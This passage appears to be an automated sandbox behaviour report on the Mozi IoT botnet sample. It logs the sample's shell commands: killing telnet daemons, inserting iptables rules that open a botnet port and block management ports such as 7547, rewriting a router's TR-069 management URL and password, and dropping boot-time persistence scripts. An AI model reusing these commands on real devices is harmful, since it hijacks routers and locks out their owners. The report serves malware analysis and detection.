              Source: /usr/bin/killall (PID: 4602)File opened: /proc/271/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/151/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/152/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/153/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/395/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/396/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/154/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/155/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/156/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1017/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/157/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/158/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/159/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3432/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3432/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/50/stat
              Source: /tmp/mozi.a.zip (PID: 4600)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
              Source: /tmp/mozi.a.zip (PID: 4634)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4668)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4671)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4711)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4732)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4741)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4764)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4789)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4811)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4814)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4818)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4838)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4865)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
              Source: /tmp/mozi.a.zip (PID: 4875)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
              Source: /tmp/mozi.a.zip (PID: 4887)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4911)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4938)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4960)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4978)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4998)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5015)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5034)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5053)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5072)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5087)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5113)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5217)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5220)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5223)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5233)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5255)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5282)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5306)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5332)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
              Source: /bin/sh (PID: 4638)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Source: /tmp/mozi.a.zip (PID: 4625)Reads from proc file: /proc/statJump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File written: /usr/networksJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
              Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundqemu: uncaught target signal 11 (Segmentation fault) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Drops files in suspicious directoriesShow sources
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/S95baby.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountall.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/checkfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/umountnfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountkernfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/bootmisc.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/checkroot.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/hwclock.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/hostname.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountdevsubfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountall-bootclean.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountnfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /usr/bin/gettext.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /usr/sbin/alsa-info.shJump to dropped file
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 56274 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 56274
              Source: unknownNetwork traffic detected: HTTP traffic on port 45556 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 45556
              Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 39288